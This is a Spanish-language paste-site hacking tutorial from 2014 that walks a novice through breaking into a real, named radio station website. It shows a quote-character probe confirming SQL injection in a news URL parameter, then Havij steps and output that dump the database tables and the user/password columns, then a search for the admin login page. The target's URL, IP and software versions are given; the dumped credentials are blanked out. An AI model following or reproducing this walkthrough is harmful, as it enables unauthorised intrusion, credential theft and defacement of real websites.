TUTORIAL HACKER BY REALTIME

SUBMITTED BY: Guest

DATE: Feb. 1, 2014, 1:36 a.m.

FORMAT: Text only

SIZE: 6.2 kB

Raw Download

HITS: 664

Report
  1. ________________________________________________________________________
  2. +++++++++++++++++++++++++ºº_.TUTORIAL._ºº+++++++++++++++++++++++++++++++
  3. +++++++++++++++++++++++++ºººººººººººººººº+++++++++++++++++++++++++++++++
  4. ++++++++ ___ _ _____ ++++++++
  5. ++++++++| _`\ (_ ) (_ _)_ ++++++++
  6. ++++++++| (_) ) __ _ _ | | | | (_) ___ ___ __ ++++++++
  7. ++++++++| , / /'__`\ /'_` ) | | | | | |/' _ ` _ `\ /'__`\++++++++
  8. ++++++++| |\ \ ( ___/( (_| | | | | | | || ( ) ( ) |( ___/++++++++
  9. ++++++++(_) (_)`\____)`\__,_)(___) (_) (_)(_) (_) (_)`\____)++++++++
  10. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  11. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  14. ++++++++++++++++++++++++++++He decidido retirarme... me pondré a jugar Ragnarok..y tibia también, así que no tengo tiempo para dumps D:
  15. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  16. Así que aquí les va un ultimo filtrado de datos :) les enseñare también como buscarlos..)
  17. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  18. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  19. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  20. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  21. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  23. Hola a todos y bienvenidos a un tutorial de web deface.
  24. Para esto, usare la web Radio Bastarda para enseñarles....
  25. nos metemos a radiobastarda y buscamos donde podemos encontrar una vulnerabilidad... yo encontré esta: http://radiobastarda.com/verNoticiaBastarda.php?idNoticia=113 , como lo se? porque hice esto: http://radiobastarda.com/verNoticiaBastarda.php?idNoticia='113 (podran ver que esta llena de vulnerabilidades xD)
  27. Una vez que tenemos la url con vul procedemos a usar el programa "havij"... ponemos la url (http://radiobastarda.com/verNoticiaBastarda.php?idNoticia=113) en el target y le damos a analyce
  28. Esperamos.....
  29. esperamos.....
  30. Vemos que nos da esta info:
  31. Host IP: 95.211.110.117
  32. Web Server: Apache/2
  33. Powered-by: PHP/5.2.12
  34. Finding Keyword...
  35. +++++++++++++++++++
  36. por mientras.. :D
  37. +++++++++++++++++++
  38. hay vemos que encontró la db:
  40. Injection type is Integer
  41. DB Server: MySQL >=5
  42. Selected Column Count is 4
  43. Valid String Column is 2
  44. Current DB: radiobas_db
  45. ++++++++++++++++++++++
  46. ahora procedemos a hacer click en tables y después en get tables...
  47. ----------------------
  48. fue bastante rápido.. :)
  49. podemos ver que el programa nos dice esto:
  51. Tables found: bastardes,comentario,comentariopublicacion,conductor,etiquetas,etiquetaspublicacion,lamento,noticia,programa,recomendacion,reportaje,usuarios
  53. Lo que nos interesa es tabla "usuarios". Marcamos la tabla y le damos en get collumns
  55. Bueno: Columns found: idUsuario,usuario,password
  56. marcamos usuario, password.
  57. y le damos en get data
  59. Ahora miramos el tesoro (para ti, que es tu primera intrusión en una web ;) )
  60. Count(*) of radiobas_db.usuarios is 8
  61. Data Found: usuario,password=AQUI VA LOS USUARIOS Y PASS
  62. Data Found: usuario,password=Los borre
  63. Data Found: usuario,password=para que no se te haga tan facil
  64. Data Found: usuario,password=cuando hagas el paso anterior los veras en el rpograma havij ;)
  65. Data Found: usuario,password=
  66. Data Found: usuario,password=
  67. Data Found: usuario,password=
  68. Data Found: usuario,password=
  69. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  70. Muy bien, ahora lo que haremos es hacer click en find admin (para encontrar donde cresta poner los datos que sacaste ahora!)
  71. Miren, las dos primeros links nos interesan. uno dice http://asdasda.cl/ (ejemplo) y dice "200 ok". funciona pero la que dice 302 found es la que sirve..
  72. ahora solo queda ingresar datos y LISTO!!
  73. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  74. Felicidades, terminaste el tutorial !:)
  75. Gracias por leerlo también dx
  76. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  77. ________________________________________________________________________
  78. +++++++++++++++++++++++++ºº_.TUTORIAL._ºº+++++++++++++++++++++++++++++++
  79. +++++++++++++++++++++++++ºººººººººººººººº+++++++++++++++++++++++++++++++
  80. ++++++++ ___ _ _____ ++++++++
  81. ++++++++| _`\ (_ ) (_ _)_ ++++++++
  82. ++++++++| (_) ) __ _ _ | | | | (_) ___ ___ __ ++++++++
  83. ++++++++| , / /'__`\ /'_` ) | | | | | |/' _ ` _ `\ /'__`\++++++++
  84. ++++++++| |\ \ ( ___/( (_| | | | | | | || ( ) ( ) |( ___/++++++++
  85. ++++++++(_) (_)`\____)`\__,_)(___) (_) (_)(_) (_) (_)`\____)++++++++
  86. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  87. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  88. Saludos, queridos wannabers :D
  89. Saludos, queridos lammers :D
  90. Saludos, queridos Scripter Kiddies :D
  91. __________________________________________________________________________________________________
comments powered by Disqus